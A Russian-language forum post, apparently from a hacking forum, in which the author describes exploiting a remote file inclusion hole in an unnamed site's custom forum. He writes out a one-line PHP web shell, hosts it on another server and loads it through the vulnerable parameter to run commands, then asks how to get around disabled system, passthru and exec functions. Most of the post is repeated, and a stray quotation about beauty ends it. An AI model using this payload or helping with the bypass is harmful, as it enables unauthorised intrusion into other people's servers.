Есть некий сайт. На его самописном форуме ссылки на темы имеют вид типа: topic_id=num.
Проверил на наличие num.php - существует. При чём тот самый.
Далее в браузере ввожу: http://имя_сайта/forum/topic_id=http://www.securitylab.ru Загрузилась главная страница секлаба.
Далее: на сайт site.com забрасываю shell.php с таким содержимым: nbsp; nbsp; nbsp;lt;? system($cmd); ? gt;
Пишу: http://имя_сайта/forum/topic_id=http://site.com/shell.php cm d=ls
получаю в ответ: Warning: system() has been disabled for security reasons in on line 2
Тогда в файле shell.php заменил cmd на passthru. В ответ:
Warning: passthru() has been disabled for security reasons in on line 1
Попытался подрубить phpshell - уже кем-то написанный. Выдаёт:
Warning: exec() has been disabled for security reasons in on line 82
Как быть?
Проверил на наличие num.php - существует. При чём тот самый.
Далее в браузере ввожу: http://имя_сайта/forum/topic_id=http://www.securitylab.ru Загрузилась главная страница секлаба.
Далее: на сайт site.com забрасываю shell.php с таким содержимым: nbsp; nbsp; nbsp;lt;? system($cmd); ? gt;
Пишу: http://имя_сайта/forum/topic_id=http://site.com/shell.php cm d=ls
получаю в ответ: Warning: system() has been disabled for security reasons in on line 2
Тогда в файле shell.php заменил cmd на passthru. В ответ:
Warning: passthru() has been disabled for security reasons in on line 1
Попытался подрубить phpshell - уже кем-то написанный. Выдаёт:
Warning: exec() has been disabled for security reasons in on line 82
Как быть?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
